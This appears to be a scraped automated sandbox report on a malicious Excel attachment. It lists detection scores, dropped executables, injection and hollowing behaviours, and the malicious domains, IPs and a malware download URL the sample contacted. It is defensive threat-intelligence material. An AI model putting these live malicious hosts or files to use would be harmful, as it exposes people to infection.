16->20         started        23 schtasks.exe 16->23         started        signatures9 process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 20->67 69 Maps a DLL or memory area into another process 20->69 71 Sample uses process hollowing technique 20->71 73 2 other signatures 20->73 25 wlanext.exe 20->25         started        28 explorer.exe 20->28 injected process12 dnsIp13 75 Modifies the context of a thread in another process (thread injection) 25->75 77 Maps a DLL or memory area into another process 25->77 79 Tries to detect virtualization through RDTSC time measurements 25->79 31 cmd.exe 25->31         started        45 brainandbodystrengthcoach.com 34.102.136.180, 49167, 80 GOOGLEUS United States 28->45 47 fixmygearfast.com 160.153.136.3, 49166, 80 GODADDY-AMSDE United States 28->47 49 7 other IPs or domains 28->49 81 System process connects to network (likely due to code injection or exploit) 28->81 signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order_00009.xlsx30%VirustotalBrowse
          Order_00009.xlsx22%ReversingLabsDocument-Office.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          fixmygearfast.com2%VirustotalBrowse
          www.shemaledreamz.com1%VirustotalBrowse
          medicelcoolers.cn8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://medicelcoolers.cn/file2.exe100%Avira URL Cloudmalware
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe
          http://www.news.com.au/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s.multiscreensite.com
          35.172.94.1
          truefalse
            high
            fixmygearfast.com
            160.153.136.3
            truetrueunknown
            www.shemaledreamz.com
            45.11.187.140
            truefalseunknown
            medicelcoolers.cn
            185.26.106.165
            truetrueunknown
            brainandbodystrengthcoach.com
            34.102.136.180
            truetrue
              unknown
              www.stattests.com
              unknown
              unknowntrue
                unknown
                www.beamsubway.com
                unknown
                unknowntrue
                  unknown
                  www.herbmedia.net
                  unknown
                  unknowntrue
                    unknown
                    www.brainandbodystrengthcoach.com
                    unknown
                    unknowntrue
                      unknown
                      www.fixmygearfast.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://medicelcoolers.cn/file2.exetrue
                        • Avira URL Cloud: malware
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
                          http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://search.ebay.de/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mtv.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.rambler.ru/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://buscar.ya.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://asp.usatoday.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://rover.ebay.comexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://search.ebay.in/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://%s.comexplorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      low
                                                      http://msk.afisha.ru/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2183888170.0000000002213000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.rediff.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2193050323.0000000003C40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.google.ru/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.daum.net/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://buscar.ozu.es/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.about.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.ask.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.cjmall.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.centrum.cz/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://suche.t-online.de/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.google.it/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.amazon.de/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2200558819.00000000082FD000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2205349635.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.%s.comPAvbc.exe, 00000004.00000002.2187410622.0000000004CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380626235.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      low
                                                                                                                                                      http://ariadna.elmundo.es/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.news.com.au/favicon.icoexplorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.cdiscount.com/explorer.exe, 00000008.00000000.2205552805.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          160.153.136.3
                                                                                                                                                          unknownUnited States
                                                                                                                                                          21501GODADDY-AMSDEtrue
                                                                                                                                                          34.102.136.180
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUStrue
                                                                                                                                                          35.172.94.1
                                                                                                                                                          unknownUnited States
                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                          185.26.106.165
                                                                                                                                                          unknownFrance
                                                                                                                                                          24935ATE-ASFRtrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                          Analysis ID:339205
                                                                                                                                                          Start date:13.01.2021
                                                                                                                                                          Start time:17:22:41
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 10m 37s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:Order_00009.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:11
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@12/8@13/4
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 29.6% (good quality ratio 28.2%)
                                                                                                                                                          • Quality average: 70.8%
                                                                                                                                                          • Quality standard deviation: 28.6%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 94%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
